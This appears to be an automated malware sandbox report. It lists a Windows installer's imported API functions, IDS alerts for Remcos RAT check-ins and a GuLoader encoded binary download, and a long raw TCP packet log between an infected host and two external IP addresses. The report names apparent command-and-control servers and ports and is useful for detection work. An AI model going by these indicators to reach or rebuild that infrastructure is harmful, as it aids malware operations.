KERNEL32.dll | ExitProcess, SetFileAttributesW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, SetCurrentDirectoryW, GetFileAttributesW, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, GetShortPathNameW, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalUnlock, GetDiskFreeSpaceW, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll | GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
ADVAPI32.dll | AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
10/31/23-13:20:00.651244 | TCP | 2032776 | ET TROJAN Remcos 3.x Unencrypted Checkin | 50077 | 2402 | 192.168.11.20 | 94.156.6.253
10/31/23-13:26:11.604235 | TCP | 2032777 | ET TROJAN Remcos 3.x Unencrypted Server Response | 2402 | 50077 | 94.156.6.253 | 192.168.11.20
10/31/23-13:19:57.803142 | TCP | 2855192 | ETPRO TROJAN GuLoader Encoded Binary Request M2 | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.412461042 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.412482977 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.412499905 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.412583113 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.412583113 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.412628889 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.412646055 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.412787914 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.715475082 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.715574980 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.715647936 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.715727091 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.715766907 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.715768099 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.715801954 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.715876102 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.715924025 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.715949059 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.715981960 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.716053009 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.716063023 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.716150999 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.716149092 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.716223001 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.716296911 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.716306925 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.716368914 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.716375113 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.716439962 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.716444016 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.716496944 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.716511011 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.716581106 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.716651917 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.716650963 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.716722012 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.716737986 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.716737986 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.716793060 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.716821909 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.716864109 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.716938972 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.717009068 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.717031002 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.717031002 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.717081070 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.717130899 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.717154026 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.717180967 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.717225075 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.717247009 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.717295885 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.717355013 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.717392921 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.717410088 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.717535973 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.717528105 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.717587948 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.717655897 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.717744112 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.717755079 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.717818975 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.717828989 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.717901945 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.717921019 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.717972040 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.717986107 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.718044043 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.718113899 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.718128920 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.718183994 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.718219995 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.718255997 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.718270063 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.718327999 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.718349934 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.718410015 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.718417883 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.718478918 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.718483925 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.718545914 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.718595982 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.718645096 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.718753099 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.021984100 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.022200108 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.022814035 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.023062944 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.023330927 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.023416042 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.023479939 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.023545980 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.023570061 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.023570061 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.023612976 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.023677111 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.023739100 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.023751020 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.029016018 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.029033899 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.029051065 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.029068947 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.029103994 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.029151917 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.029151917 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.029200077 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.029238939 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.029376030 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.325880051 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.325987101 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.326142073 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.326211929 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.327706099 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.327810049 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.327888012 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.327920914 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.327960014 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.328069925 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.328069925 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.328085899 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.328131914 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.328165054 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.328236103 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.328275919 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.328309059 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.328375101 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.328383923 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.328429937 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.328455925 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.328528881 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.328596115 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.328597069 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.328732967 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.328744888 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.328746080 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.328815937 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.328888893 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.328958035 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.328986883 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.329027891 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.329077959 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.329097986 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.329138041 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.329169989 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.329241991 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.329279900 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.329279900 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.329312086 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.329360962 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.329382896 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.329454899 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.329549074 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.329550028 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.329622030 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.329696894 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.329761028 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.329823017 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.329866886 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.329884052 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.329940081 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.329946995 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.329994917 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.330009937 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.330038071 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.330074072 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.330135107 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.330162048 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.330197096 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.330251932 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.330311060 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.330317020 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.330353975 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.330435038 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.330528021 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.330631018 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.330634117 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.330698967 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.330760002 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.330787897 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.330848932 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.330877066 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.330940962 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.331001997 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.331015110 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.331074953 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.331074953 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.331176996 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.331202984 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.331267118 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.331327915 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.331383944 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.331464052 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.331485033 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.331516981 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.331547976 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.331610918 CET8050076217.147.225.69192.168.11.20
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 31, 2023 13:19:59.331736088 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.331765890 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.331793070 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.331829071 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.331969023 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.331969023 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.332259893 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.332324982 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.332386017 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.332448006 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.332463026 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.332463026 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.332499027 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.332519054 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.332536936 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.332556009 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.332590103 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.332590103 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.332628012 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.332679987 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.332679987 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.332679987 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.332864046 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.332904100 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.332922935 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.332942009 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.333036900 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.333036900 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.333108902 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.333121061 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.333147049 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.333267927 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.333267927 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.333579063 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.333604097 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.333622932 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.333642006 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.333662987 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.333681107 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.333699942 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.333718061 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.333724022 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.333724022 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.333821058 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.333821058 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.333821058 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.333869934 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.333905935 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.333930016 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
